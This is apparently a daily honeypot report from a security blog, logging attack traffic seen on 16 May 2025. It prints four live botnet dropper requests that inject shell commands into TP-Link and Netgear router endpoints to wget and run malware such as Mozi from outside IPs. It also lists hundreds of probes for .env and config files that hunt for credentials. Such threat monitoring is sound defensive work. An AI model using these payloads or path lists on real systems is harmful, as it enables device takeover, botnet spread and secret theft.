Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-05-16

·1581 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-16
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).

There are 258 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1328 requests were recorded during the day, originating from 4 different countries, with a peak of 402 requests coming from GB.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
USGermany
SGGermany
USGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1
123.129.130.253GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://123.129.130.253:53205/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
196.189.10.187GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.135.194.174/jaws;sh+/tmp/jaws HTTP/1.1
175.107.1.188GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://175.107.1.188:46194/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
852GET /.env-git.log HTTP/1.1
872GET /.env-api.env HTTP/1.1
962GET /.env-build.log HTTP/1.1
982GET /.env-stage.log HTTP/1.1
1002GET /.env-event.log HTTP/1.1
1031GET /.env-ci.conf HTTP/1.1
1041GET /.env-cd.conf HTTP/1.1
1051GET /.env-dev.conf HTTP/1.1
1061GET /.env-activity.log HTTP/1.1
1071GET /.env-prod.conf HTTP/1.1
1081GET /.env-staging.conf HTTP/1.1
1111POST /api/user/binLookup?time=1747366682156991381 HTTP/1.1
1121GET /api/bin/440393?time=1747366680682615575 HTTP/1.1
1171GET /config/index?time=1747365459919719017 HTTP/1.1
1201GET /api/bin/440393?time=1747366519131259110 HTTP/1.1
1211POST /api/user/binLookup?time=1747366521307028752 HTTP/1.1
1271GET /.env-trace.log HTTP/1.1
1281GET /config/index?time=1747393665627164394 HTTP/1.1
1291GET /api/bin/440393?time=1747394733383935843 HTTP/1.1
1301POST /api/user/binLookup?time=1747394735634417140 HTTP/1.1
1391GET /.env-notification.conf HTTP/1.1
1451GET /config/index?time=1747365354445515770 HTTP/1.1
1511{D79E94C5-70F0-46BD-965B-E17497CCB598}
1551GET /.env-gcs.log HTTP/1.1
1561GET /.env-azure.log HTTP/1.1
1581GET /.env-aws.log HTTP/1.1
1591GET /.env-gitlab.log HTTP/1.1
1601GET /.env-github.log HTTP/1.1
1611GET /.env-bitbucket.log HTTP/1.1
1621GET /.env-k8s.log HTTP/1.1
1631GET /.env-docker.log HTTP/1.1
1641GET /.env-compose.log HTTP/1.1
1651GET /.env-container.log HTTP/1.1
1661GET /.env-orchestration.log HTTP/1.1
1671GET /.env-pod.log HTTP/1.1
1681GET /.env-node.log HTTP/1.1
1691GET /.env-mongodb.conf HTTP/1.1
1701GET /.env-ingress.log HTTP/1.1
1711GET /.env-deployment.log HTTP/1.1
1721GET /.env-rollout.log HTTP/1.1
1731GET /.env-scaling.log HTTP/1.1
1741GET /.env-proxy.log HTTP/1.1
1751GET /.env-gateway.log HTTP/1.1
1761GET /.env-api-gateway.log HTTP/1.1
1771GET /.env-nginx.conf HTTP/1.1
1781GET /.env-firewall.conf HTTP/1.1
1791GET /.env-apache.conf HTTP/1.1
1801GET /.env-tls.conf HTTP/1.1
1811GET /.env-ssl.conf HTTP/1.1
1821GET /.env-webserver.conf HTTP/1.1
1831GET /.env-server.conf HTTP/1.1
1841GET /.env-iis.conf HTTP/1.1
1851GET /.env-service.log HTTP/1.1
1861GET /.env-alerting.conf HTTP/1.1
1871GET /.env-monitoring.conf HTTP/1.1
1881GET /.env-logging.conf HTTP/1.1
1891GET /.env-storage.conf HTTP/1.1
1901GET /.env-memcached.conf HTTP/1.1
1911GET /.env-redis.conf HTTP/1.1
1921GET /.env-audit.log HTTP/1.1
1931GET /.env-postgres.conf HTTP/1.1
1941GET /.env-mysql.conf HTTP/1.1
1951GET /.env-db.conf HTTP/1.1
1961GET /.env-session.conf HTTP/1.1
1971GET /.env-cors.conf HTTP/1.1
1981GET /.env-auth.conf HTTP/1.1
1991GET /.env-security.conf HTTP/1.1
2001GET /.env-trail.log HTTP/1.1
2011GET /.env-s3.log HTTP/1.1
2021GET /.env-xml.log HTTP/1.1
2031GET /.env-html.log HTTP/1.1
2041GET /.env-http.log HTTP/1.1
2051GET /.env-request.log HTTP/1.1
2061GET /.env-response.log HTTP/1.1
2071GET /.env-breach.log HTTP/1.1
2081GET /.env-incident.log HTTP/1.1
2091GET /.env-alert.log HTTP/1.1
2101GET /.env-notice.log HTTP/1.1
2111GET /.env-warning.log HTTP/1.1
2121GET /.env-critical.log HTTP/1.1
2131GET /.env-info.log HTTP/1.1
2141GET /.env-diagnostics.log HTTP/1.1
2151GET /.env-integration.log HTTP/1.1
2161GET /.env-cloud.log HTTP/1.1
2171GET /.env-json.log HTTP/1.1
2321GET /.env-access.log HTTP/1.1
3441GET /config.backup HTTP/1.1
3541GET /.env_hidden HTTP/1.1
3591GET /.env.5 HTTP/1.1
3601GET /.env.4 HTTP/1.1
3611GET /.env.3 HTTP/1.1
3671CONNECT google.com:443 HTTP/1.0
3741GET /.env.back HTTP/1.1
3751GET /.env-report.env HTTP/1.1
3761GET /.env-sitemap.env HTTP/1.1
3771GET /.env-doc.env HTTP/1.1
3781GET /.env-meta.env HTTP/1.1
3791GET /.env-info.env HTTP/1.1
3801GET /.env-scan.env HTTP/1.1
3811GET /.env-properties.env HTTP/1.1
3821GET /.env-variables.env HTTP/1.1
3831GET /.env-vars.env HTTP/1.1
3841GET /.env-params.env HTTP/1.1
3851GET /.env-logs.env HTTP/1.1
3861GET /.env-debug.env HTTP/1.1
3871GET /.env-cache.env HTTP/1.1
3881GET /.env-session.env HTTP/1.1
3891GET /.env-firewall.env HTTP/1.1
3901GET /config.1.php HTTP/1.1
3911GET /.env-creds.env HTTP/1.1
3921GET /.env-keys.env HTTP/1.1
3931GET /.env-token.env HTTP/1.1
3941GET /.env-oauth.env HTTP/1.1
3951GET /.env-auth.env HTTP/1.1
3961GET /.env-admin.env HTTP/1.1
3971GET /.env-user.env HTTP/1.1
3981GET /.env-cloud.env HTTP/1.1
3991GET /wp-config.php.old/.env-gcs.env HTTP/1.1
4021GET /config.staging.php HTTP/1.1
4031GET /config_dev.php HTTP/1.1
4041GET /config.tmp HTTP/1.1
4051GET /config.save HTTP/1.1
4061GET /.env-password.env HTTP/1.1
4381JRMI\x00\x02K
4411POST /api/user/binLookup?time=1747392685581485130 HTTP/1.1
4421GET /api/bin/440393?time=1747392684482723971 HTTP/1.1
4431GET /config/index?time=1747392596164519114 HTTP/1.1
4561GET /SaAh HTTP/1.1
4571GET /yT6Y HTTP/1.1
4581GET /config/index?time=1747364091610731499 HTTP/1.1
4591POST /api/user/binLookup?time=1747364066490399546 HTTP/1.1
4601GET /api/bin/440393?time=1747364065161518296 HTTP/1.1
4701GET /.env-database.log HTTP/1.1
4711GET /.env-admin.log HTTP/1.1
4721GET /.env-user.log HTTP/1.1
4731GET /.env-client.log HTTP/1.1
4741GET /.env-api.log HTTP/1.1
4751GET /.env-session.log HTTP/1.1
4761GET /.env-cert.log HTTP/1.1
4771GET /.env-ssl.log HTTP/1.1
4781GET /.env-security.log HTTP/1.1
4791GET /.env-monitor.log HTTP/1.1
4801GET /.env-web.log HTTP/1.1
4811GET /.env-server.log HTTP/1.1
4821GET /.env-iis.log HTTP/1.1
4831GET /.env-apache.log HTTP/1.1
4841GET /.env-check.env HTTP/1.1
4851GET /.env-php.log HTTP/1.1
4861GET /.env-stack.log HTTP/1.1
4871GET /.env-system.log HTTP/1.1
4881GET /.env-warnings.log HTTP/1.1
4891GET /.env-debug.log HTTP/1.1
4901GET /.env-error.log HTTP/1.1
4911GET /.env-smtp.log HTTP/1.1
4921GET /.env-token.log HTTP/1.1
4931GET /.env-login.log HTTP/1.1
4941GET /.env-auth.log HTTP/1.1
4951GET /.env-runner.log HTTP/1.1
4961GET /.env-job.log HTTP/1.1
4971GET /.env-worker.log HTTP/1.1
4981GET /.env-cron.log HTTP/1.1
4991GET /.env-release.log HTTP/1.1
5001GET /.env-nginx.log HTTP/1.1
5011GET /.env-hacking.log HTTP/1.1
5021GET /.env-exploit.log HTTP/1.1
5031GET /.env-rfi.log HTTP/1.1
5041GET /.env-lfi.log HTTP/1.1
5051GET /.env-ssrf.log HTTP/1.1
5061GET /.env-sqli.log HTTP/1.1
5071GET /.env-xss.log HTTP/1.1
5081GET /.env-csrf.log HTTP/1.1
5091GET /.env-cors.log HTTP/1.1
5101GET /.env-acl.log HTTP/1.1
5111GET /.env-ids.log HTTP/1.1
5121GET /.env-rules.log HTTP/1.1
5131GET /.env-firewall.log HTTP/1.1
5141GET /.env-waf.log HTTP/1.1
5151GET /.env-checks.log HTTP/1.1
5161GET /.env-db.log HTTP/1.1
5171GET /.env-observability.log HTTP/1.1
5181GET /.env-telemetry.log HTTP/1.1
5191GET /.env-metrics.log HTTP/1.1
5201GET /.env-cache.log HTTP/1.1
5211GET /.env-tokens.log HTTP/1.1
5221GET /.env-authorization.log HTTP/1.1
5231GET /.env-authentication.log HTTP/1.1
5241GET /.env-password.log HTTP/1.1
5251GET /.env-secret.log HTTP/1.1
5261GET /.env-vault.log HTTP/1.1
5271GET /.env-vcs.log HTTP/1.1
5281GET /.env-prod.log HTTP/1.1
5291GET /.env-dev.log HTTP/1.1
5301GET /.env-cicd.log HTTP/1.1
5311GET /.env-storage.log HTTP/1.1
5321GET /.env-health.log HTTP/1.1
5331GET /.env-export.env HTTP/1.1
5341GET /.env-archive.env HTTP/1.1
5351GET /.env-snapshot.env HTTP/1.1
5361GET /.env-dump.env HTTP/1.1
5371GET /.env-template.env HTTP/1.1
5381GET /.env-example.env HTTP/1.1
5391GET /.env-test.env HTTP/1.1
5401GET /.env-sample.env HTTP/1.1
5411GET /.env-data.env HTTP/1.1
5421GET /.env-response.env HTTP/1.1
5431GET /.env-request.env HTTP/1.1
5441GET /.env-get.env HTTP/1.1
5451GET /.env-post.env HTTP/1.1
5461GET /.env-fetch.env HTTP/1.1
5471GET /.env-deploy.log HTTP/1.1
5481GET /.env-header.env HTTP/1.1
5491GET /.env-trace.env HTTP/1.1
5501GET /.env-whois.env HTTP/1.1
5511GET /.env-location.env HTTP/1.1
5521GET /.env-country.env HTTP/1.1
5531GET /.env-ip.env HTTP/1.1
5541GET /.env-iplist.env HTTP/1.1
5551GET /.env-top1000.env HTTP/1.1
5561GET /.env-top500.env HTTP/1.1
5571GET /.env-top100.env HTTP/1.1
5581GET /.env-top.env HTTP/1.1
5591GET /.env-hitlist.env HTTP/1.1
5601GET /.env-hits.env HTTP/1.1
5611GET /.env-ids.env HTTP/1.1
5621GET /.env-results.env HTTP/1.1
5631GET /.env-curl.env HTTP/1.1
5641GET /.env-pipeline.log HTTP/1.1
5651GET /.env-ci.log HTTP/1.1
5661GET /.env-builder.js HTTP/1.1
5671GET /.env-builder.env HTTP/1.1
5681GET /.env-devconsole.env HTTP/1.1
5691GET /.env-devtools.env HTTP/1.1
5701GET /.env-dev.env HTTP/1.1
5711GET /.env-ui.env HTTP/1.1
5721GET /.env-ext.env HTTP/1.1
5731GET /.env-internal.env HTTP/1.1
5741GET /.env-front.env HTTP/1.1
5751GET /.env-back.env HTTP/1.1
5761GET /.env-service.env HTTP/1.1
5771GET /.env-micro.env HTTP/1.1
5781GET /.env-webapp.env HTTP/1.1
5791GET /.env-import.env HTTP/1.1
5801GET /.env-interface.env HTTP/1.1
5811GET /.env-gui.env HTTP/1.1
5821GET /.env-center.env HTTP/1.1
5831GET /.env-control.env HTTP/1.1
5841GET /.env-portal.env HTTP/1.1
5851GET /.env-console.env HTTP/1.1
5861GET /.env-dashboard.env HTTP/1.1
5871GET /.env-backend.env HTTP/1.1
5881GET /.env-admin-panel.env HTTP/1.1
5891GET /.env-agent.env HTTP/1.1
5901GET /.env-crawler.env HTTP/1.1
5911GET /.env-spider.env HTTP/1.1
5921GET /.env-probe.env HTTP/1.1
5931GET /.env-download.env HTTP/1.1
5941GET /.env-upload.env HTTP/1.1
5951GET /.env-web.env HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0402GB
1327US
2230BG
386PL
461DE
537SC
627NL
724JP
822CN
915CA
1012AZ
117RO
127IN
135FR
145HK
155GH
165ZA
175ES
185AO
194IL
204KR
214LT
223IR
233TR
243BR
253SG
263RU
272VN
282AR
292UA
301ET
311PK
321IT
331BE
341HU
351PE
361IQ
371CZ

Related

Report: 2025-05-15
·368 words
Repport Daily
Report: 2025-05-14
·403 words
Repport Daily
Report: 2025-05-13
·323 words
Repport Daily